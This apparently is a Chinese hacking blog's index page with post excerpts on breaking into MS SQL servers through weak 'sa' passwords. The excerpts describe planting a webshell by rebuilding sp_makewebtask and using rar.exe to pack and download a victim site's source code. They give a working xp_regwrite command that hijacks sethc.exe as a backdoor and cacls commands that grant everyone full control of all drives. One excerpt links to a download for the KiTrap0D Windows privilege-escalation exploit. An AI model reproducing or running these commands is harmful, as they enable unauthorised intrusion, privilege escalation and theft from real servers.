前一段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗.其实在sa权限下还是有很多的问题的 大家可以捡有用的看 没用的就略过吧)
下面来说sa下执行命令错误的几种情况:
1、 无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)
...- 添加新评论
- 阅读次数:
今天偶然发现有一个SA权限。服务器管理员将大部份扩展都删除了。最后自己重建sp_makewebtask存储才搞到一个webshell了。(重建办法,先找台正常主机,sp_helptext 'sp_makewebtask',将他的SQL语句重新拷到目标机器执行一次就行了)。
当然有了webshell,无法满足我们贪婪的欲望。开始测试提权。有serv-u,但是提权失败了。也许大家会说用back log来提权。但是那个太慢了,要重启机器,会影响对方业务,同时又会给对方留下不好的印像。有人也许会说用读取系统账号的注册表,导入导出,克隆账号,这个办法也可行,但由于并非黑对方主机,还是要保证对方系统的安整性比较好。(也许是心理因素,^_^)
...- 添加新评论
- 阅读次数:
rar.exe是什么?它就是大名鼎鼎的winrar自带的命令行解压程序。在提权中我们经常要下载各种敏感文件,比如:SU目录。你想一下,如果su目录文件这么多,难道你要一个个的下载??这明显就很麻烦,有了rar.exe一切变的简单了!
好了现在来介绍它的用法吧!得到了Webshell后,最好自己传一个rar.exe,虽然program files目录有,但是有时执行不了。rar.exe体积200K,呵呵!将就下。在CMDSHELL执行:\1\Rar.exe a -k -r -s -m1 E:\web\1.rar E:\web\。我来介绍下吧,"D:\1\rar.exe"是你上传的rar.exe,后面参数我会给大家放在下面;"E:\web\1.rar"是你压缩的文件存放的位置(在shell中一定要选能写的目录);"E:\web\"是你要打包的目录。很简单吧?以后在没有得到服务器,大家可以尝试我介绍的方法,下载整站源码。
...
- 添加新评论
- 阅读次数:
sa权限如果xp_cmdshell不可用时,可以尝试用xp_regwrite写注册表,替换sethc.exe实现提权。
代码如下:sa提权技巧之xp_regwrite 替换sethc.exe
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'
- 添加新评论
- 阅读次数:
Cacls提权命令整理:
Cacls的命令参数:
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置
...
- 添加新评论
- 阅读次数:
windows最新0day 通杀所有版本
通杀 XP 2K 2K3 2K8 VISTA WIN7
用法:以普通用户登录windows
执行exp 弹出一个cmdshell 这个shell即为 system权限的
Win-ver-exploit Exploit : KiTrap0D.rar (316 K)
下载地址:
http://bbs.honkwin.com/read-htm-tid-1907.html
...
- 添加新评论
- 阅读次数: